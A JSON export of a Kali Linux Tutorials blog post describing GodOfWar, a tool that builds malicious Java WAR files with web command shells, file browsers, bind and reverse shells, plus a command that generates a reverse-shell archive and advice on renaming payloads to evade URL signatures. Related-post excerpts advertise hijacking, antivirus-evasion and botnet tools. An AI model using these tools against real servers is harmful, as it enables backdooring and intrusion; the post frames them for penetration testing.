{"id":4629,"date":"2019-04-14T16:34:56","date_gmt":"2019-04-14T11:04:56","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=4629"},"modified":"2019-04-14T16:34:56","modified_gmt":"2019-04-14T11:04:56","slug":"godofwar-malicious-java-war-builder","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/","title":{"rendered":"GodOfWar : Malicious Java WAR Builder With Built-In Payloads"},"content":{"rendered":"\n<p>GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Features<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Preexisting payloads. (try -l\/&#8211;list)<ul><li> cmd_get<\/li><li> filebrowser<\/li><li> bind_shell<\/li><li> reverse_shell<\/li><li> reverse_shell_ui<\/li><\/ul><\/li><li> Configurable backdoor. (try &#8211;host\/-port)<\/li><li> Control over payload name.<ul><li> To avoid malicious name after deployment to bypass URL name signatures.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p><strong>Also Read &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/mysql-magic-dump-mysql\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"MySQL Magic: Dump MySQL Client Password From Memory (opens in a new tab)\">MySQL Magic: Dump MySQL Client Password From Memory<\/a><\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Installation<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$ gem install godofwar<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p style=\"text-align:left\" class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$ godofwar -h <\/strong><br><br><strong>Help menu:<\/strong><br>    -p, &#8211;payload PAYLOAD            Generates war from one of the available payloads.                                         (check -l\/&#8211;list)<br>    -H, &#8211;host IP_ADDR               Local or Remote IP address for the chosen payload                                         (used with -p\/&#8211;payload)<br>    -P, &#8211;port PORT                  Local or Remote Port for the chosen payload                                         (used with -p\/&#8211;payload)<br>    -o, &#8211;output [FILE]              Output file and the deployment name.<br>                                         (default is the payload original name. check &#8216;-l\/&#8211;list&#8217;)<br>    -l, &#8211;list                       list all available payloads.<br>    -h, &#8211;help                       Show this help message.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Example<\/strong><\/p>\n\n\n\n<p>List all payloads<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ godofwar -l\n\u251c\u2500\u2500 cmd_get\n\u2502   \u2514\u2500\u2500 Information:\n\u2502       \u251c\u2500\u2500 Description: Command execution via web interface\n\u2502       \u251c\u2500\u2500 OS:          any\n\u2502       \u251c\u2500\u2500 Settings:    {\"false\"=>\"No Settings required!\"}\n\u2502       \u251c\u2500\u2500 Usage:       http:\/\/host\/cmd.jsp?cmd=whoami\n\u2502       \u251c\u2500\u2500 References:  [\"https:\/\/github.com\/danielmiessler\/SecLists\/tree\/master\/Payloads\/laudanum-0.8\/jsp\"]\n\u2502       \u2514\u2500\u2500 Local Path:  \/var\/lib\/gems\/2.5.0\/gems\/godofwar-1.0.1\/payloads\/cmd_get\n\u251c\u2500\u2500 filebrowser\n\u2502   \u2514\u2500\u2500 Information:\n\u2502       \u251c\u2500\u2500 Description: Remote file browser, upload, download, unzip files and native command execution\n\u2502       \u251c\u2500\u2500 OS:          any\n\u2502       \u251c\u2500\u2500 Settings:    {\"false\"=>\"No Settings required!\"}\n\u2502       \u251c\u2500\u2500 Usage:       http:\/\/host\/filebrowser.jsp\n\u2502       \u251c\u2500\u2500 References:  [\"http:\/\/www.vonloesch.de\/filebrowser.html\"]\n\u2502       \u2514\u2500\u2500 Local Path:  \/var\/lib\/gems\/2.5.0\/gems\/godofwar-1.0.1\/payloads\/filebrowser\n\u251c\u2500\u2500 bind_shell\n\u2502   \u2514\u2500\u2500 Information:\n\u2502       \u251c\u2500\u2500 Description: TCP bind shell\n\u2502       \u251c\u2500\u2500 OS:          any\n\u2502       \u251c\u2500\u2500 Settings:    {\"port\"=>4444, \"false\"=>\"No Settings required!\"}\n\u2502       \u251c\u2500\u2500 Usage:       http:\/\/host\/reverse-shell.jsp\n\u2502       \u251c\u2500\u2500 References:  [\"Metasploit - msfvenom -p java\/jsp_shell_bind_tcp\"]\n\u2502       \u2514\u2500\u2500 Local Path:  \/var\/lib\/gems\/2.5.0\/gems\/godofwar-1.0.1\/payloads\/bind_shell\n\u251c\u2500\u2500 reverse_shell_ui\n\u2502   \u2514\u2500\u2500 Information:\n\u2502       \u251c\u2500\u2500 Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.\n\u2502       \u251c\u2500\u2500 OS:          any\n\u2502       \u251c\u2500\u2500 Settings:    {\"host\"=>\"attacker\", \"port\"=>4444, \"false\"=>\"No Settings required!\"}\n\u2502       \u251c\u2500\u2500 Usage:       http:\/\/host\/reverse_shell_ui.jsp\n\u2502       \u251c\u2500\u2500 References:  []\n\u2502       \u2514\u2500\u2500 Local Path:  \/var\/lib\/gems\/2.5.0\/gems\/godofwar-1.0.1\/payloads\/reverse_shell_ui\n\u251c\u2500\u2500 reverse_shell\n\u2502   \u2514\u2500\u2500 Information:\n\u2502       \u251c\u2500\u2500 Description: TCP reverse shell. LHOST and LPORT are hardcoded\n\u2502       \u251c\u2500\u2500 OS:          any\n\u2502       \u251c\u2500\u2500 Settings:    {\"host\"=>\"attacker\", \"port\"=>4444, \"false\"=>\"No Settings required!\"}\n\u2502       \u251c\u2500\u2500 Usage:       http:\/\/host\/reverse_shell.jsp\n\u2502       \u251c\u2500\u2500 References:  []\n\u2502       \u2514\u2500\u2500 Local Path:  \/var\/lib\/gems\/2.5.0\/gems\/godofwar-1.0.1\/payloads\/reverse_shell<\/code><\/pre>\n\n\n\n<p>Generate payload with <strong>LHOST <\/strong>and <strong>LPORT<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy<\/strong><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter is-style-squared\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/KINGSABRI\/godofwar\">Download<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby. Features Preexisting payloads. (try -l\/&#8211;list) cmd_get filebrowser bind_shell reverse_shell reverse_shell_ui Configurable backdoor. (try &#8211;host\/-port) Control over payload name. To avoid malicious name after deployment to bypass URL name signatures. Also Read &#8211; MySQL Magic: Dump MySQL [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[1367,1722,1985],"class_list":["post-4629","post","type-post","status-publish","format-standard","hentry","category-kali","tag-godofwar","tag-java","tag-malicious"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GodOfWar : Malicious Java WAR Builder With Built-In Payloads<\/title>\n<meta name=\"description\" content=\"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GodOfWar : Malicious Java WAR Builder With Built-In Payloads\" \/>\n<meta property=\"og:description\" content=\"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2019-04-14T11:04:56+00:00\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"GodOfWar : Malicious Java WAR Builder With Built-In Payloads\",\"datePublished\":\"2019-04-14T11:04:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\"},\"wordCount\":177,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"keywords\":[\"GodOfWar\",\"Java\",\"Malicious\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\",\"name\":\"GodOfWar : Malicious Java WAR Builder With Built-In Payloads\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"datePublished\":\"2019-04-14T11:04:56+00:00\",\"description\":\"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GodOfWar : Malicious Java WAR Builder With Built-In Payloads","description":"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/","og_locale":"en_US","og_type":"article","og_title":"GodOfWar : Malicious Java WAR Builder With Built-In Payloads","og_description":"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.","og_url":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2019-04-14T11:04:56+00:00","author":"R K","twitter_card":"summary_large_image","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"GodOfWar : Malicious Java WAR Builder With Built-In Payloads","datePublished":"2019-04-14T11:04:56+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/"},"wordCount":177,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"keywords":["GodOfWar","Java","Malicious"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/","url":"https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/","name":"GodOfWar : Malicious Java WAR Builder With Built-In Payloads","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"datePublished":"2019-04-14T11:04:56+00:00","description":"GodOfWar is a command-line tool to generate war payloads for penetration testing \/ red teaming purposes, written in ruby.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/godofwar-malicious-java-war-builder\/"]}]},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":4658,"url":"https:\/\/kalilinuxtutorials.com\/telekiller-hijacking-stealer-telegram-windows\/","url_meta":{"origin":4629,"position":0},"title":"TeleKiller : A Tools Session Hijacking And Stealer Local Passcode Telegram Windows","author":"R K","date":"April 17, 2019","format":false,"excerpt":"TeleKiller is a Tools Session Hijacking And Stealer Local passcode Telegram Windows and following are the features of the same. Session Hijacking Stealer Local Passcode Keylogger Shell Bypass 2 Step Verification Bypass Av (Coming Soon) Also Read - GodOfWar : Malicious Java WAR Builder With Built-In Payloads Installation Windows git\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/img.youtube.com\/vi\/Ugz1GSlTZyc\/0.jpg?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":35915,"url":"https:\/\/kalilinuxtutorials.com\/the-silk-wasm\/","url_meta":{"origin":4629,"position":1},"title":"The Silk Wasm : Revolutionizing HTML Smuggling Through WebAssembly","author":"Varshini","date":"January 30, 2025","format":false,"excerpt":"The Silk Wasm is a tool designed to obfuscate HTML smuggling techniques using WebAssembly (Wasm). HTML smuggling is a method used to embed malicious payloads directly into an HTML page, bypassing traditional network-based security measures. By leveraging Wasm, Silk Wasm enhances the obfuscation of these payloads, making them harder to\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/The-Silk-Wasm.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":36873,"url":"https:\/\/kalilinuxtutorials.com\/bypassav-2\/","url_meta":{"origin":4629,"position":2},"title":"BypassAV : Techniques To Evade Antivirus And EDR Systems","author":"Varshini","date":"March 6, 2025","format":false,"excerpt":"BypassAV refers to the collection of techniques and tools used to bypass antivirus (AV) and Endpoint Detection and Response (EDR) systems. These security solutions are designed to detect and block malicious activities, but attackers continuously develop methods to evade them. Below is an overview of key techniques and tools used\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/BypassAV-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":4661,"url":"https:\/\/kalilinuxtutorials.com\/w12scan-discovery-engine-cybersecurity\/","url_meta":{"origin":4629,"position":3},"title":"W12Scan :  A Simple Asset Discovery Engine for Cybersecurity","author":"R K","date":"April 17, 2019","format":false,"excerpt":"W12Scan is a network asset discovery engine that can automatically aggregates related assets for analysis and use. W12scan is also my graduation design. :) Here is a web source program,but the scanning end is at w12scan-client Also Read - GodOfWar : Malicious Java WAR Builder With Built-In Payloads Thinking Based\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6995,"url":"https:\/\/kalilinuxtutorials.com\/discover-scripts-automate-penetration-testing\/","url_meta":{"origin":4629,"position":4},"title":"Discover : Custom Bash Scripts Used To Automate Various Penetration Testing Tasks","author":"R K","date":"October 23, 2019","format":false,"excerpt":"Discover custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux and the Penetration Testers Framework (PTF). Download, setup, and usage git clone\u00a0https:\/\/github.com\/leebaird\/discover\u00a0\/opt\/discover\/All scripts must be ran from this location.cd \/opt\/discover\/.\/update.sh RECONDomainPersonParse salesforceSCANNINGGenerate\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":37003,"url":"https:\/\/kalilinuxtutorials.com\/dedsec_botnet\/","url_meta":{"origin":4629,"position":5},"title":"DEDSEC_BOTNET : A Comprehensive Tool For Penetration Testing And Ethical Hacking","author":"Varshini","date":"March 12, 2025","format":false,"excerpt":"DEDSEC_BOTNET is a Linux-based tool designed for creating and managing advanced botnet payloads. It is intended for use in penetration testing, ethical hacking, and educational purposes to simulate and study botnet attacks. The tool allows users to inject malicious payloads into legitimate Python code or other software, enabling the creation\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/DEDSEC_BOTNET-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/4629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=4629"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/4629\/revisions"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=4629"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=4629"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=4629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}